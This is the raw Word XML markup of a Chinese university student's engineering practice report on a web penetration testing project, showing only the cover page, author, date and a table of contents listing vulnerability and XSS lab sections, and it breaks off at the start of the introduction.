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  <w:bookmarkStart w:id="0" w:name="_Hlk171368689"/>
      <w:bookmarkEnd w:id="0"/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722"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:spacing w:val="140"/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:b/>
          <w:spacing w:val="140"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>成都信息工程大学</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="210" w:firstLine="722"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:spacing w:val="140"/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:b/>
          <w:spacing w:val="140"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>工程实践报告</w:t>
      </w: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web渗透测试项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实践</w:t>
      </w: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9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ordWrap w:val="0"/>
              <w:ind w:left="210" w:firstLine="301"/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z w:val="30"/>
              </w:rPr>
              <w:t>报告作者姓名：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3135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ordWrap w:val="0"/>
              <w:ind w:left="210" w:firstLine="301"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312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 w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>杨佳伲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ordWrap w:val="0"/>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="210" w:firstLine="301"/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z w:val="30"/>
              </w:rPr>
              <w:t>报告提交日期：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3135" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both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z w:val="30"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:t>年0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve">月 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:t>日</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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type="linesAndChars" w:linePitch="312" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="210" w:firstLine="321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目  录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="210" w:firstLine="240"/>
        <w:jc w:val="righ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报告总页数：××页</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8312"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc31481 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1 引言</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc31481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bCs/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21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_Toc10670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default" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>课题背景</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc10670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_Toc22817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default" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>本课题的研究方法</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc22817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pStyle w:val="16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_Toc9861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 w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2.相关技术和工具简介</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc9861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_Toc16336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default" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>urpsuite</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc16336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_Toc29047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default" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>大米cms</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29047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pStyle w:val="16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_Toc7704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/>
        </w:rPr>
        <w:t>3.工具准备</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7704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pStyle w:val="16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_Toc13860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 w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.信息搜集</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc13860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pStyle w:val="16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_Toc28270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.风险细节描述</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28270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_Toc26058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 w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>5.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 越权漏洞（漏洞级别：高）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8</w:t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pStyle w:val="18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_Toc31519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 w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="2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</w:rPr>
        <w:t xml:space="preserve"> 批量注册漏洞（漏洞级别：中）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>9</w:t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pStyle w:val="18"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8312"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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_Toc7472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 w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="2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</w:rPr>
        <w:t xml:space="preserve"> 修改商品id漏洞（漏洞级别：高）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21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aps/>
          <w:color w:val="auto"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8312"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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_Toc28270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 w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6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靶场xss漏洞复现练习</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8312"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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_Toc26058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 w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps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kern w:val="2"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>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cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反射型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xss漏洞</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21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aps/>
          <w:color w:val="auto"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8312"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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_Toc31519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 w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="2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cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DOM型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xss漏洞</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21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aps/>
          <w:color w:val="auto"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8312"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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_Toc7472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 w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="2"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="2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cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存储型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xss漏洞</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21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aps/>
          <w:color w:val="auto"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8312"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc18000 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>结    语</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18000 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>2</w:t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wordWrap w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="210" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId11" w:type="first"/>
          <w:footerReference r:id="rId12" w:type="first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type="linesAndChars" w:linePitch="312" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:caps/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc137206721"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkStart w:id="2" w:name="_Toc137205487"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkStart w:id="3" w:name="_Toc137206719"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkStart w:id="4" w:name="_Toc136592276"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkStart w:id="5" w:name="_Toc137206718"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkStart w:id="6" w:name="_Toc136927408"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkStart w:id="7" w:name="_Toc136927410"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkStart w:id="8" w:name="_Toc136593408"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkStart w:id="9" w:name="_Toc136592277"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkStart w:id="10" w:name="_Toc137206720"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkStart w:id="11" w:name="_Toc136593407"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkStart w:id="12" w:name="_Toc137205488"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkStart w:id="13" w:name="_Toc136593651"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkStart w:id="14" w:name="_Toc136593650"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkStart w:id="15" w:name="_Toc136593653"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkStart w:id="16" w:name="_Toc136593405"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkStart w:id="17" w:name="_Toc136927407"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkStart w:id="18" w:name="_Toc136592278"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkStart w:id="19" w:name="_Toc137205489"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkStart w:id="20" w:name="_Toc136593652"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkStart w:id="21" w:name="_Toc136927409"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkStart w:id="22" w:name="_Toc136592275"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkStart w:id="23" w:name="_Toc136593406"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkStart w:id="24" w:name="_Toc137205486"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkStart w:id="25" w:name="_Toc137205490"/>
      <w:bookmarkStart w:id="26" w:name="_Toc137206722"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="210" w:firstLine="301"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc31481"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1 引言</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="210" w:firstLine="281"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc10670"/>
      <w:bookmarkStart w:id="29" w:name="_Toc137206723"/>
      <w:bookmarkStart w:id="30" w:name="_Toc137205491"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>课题背景</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="240"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
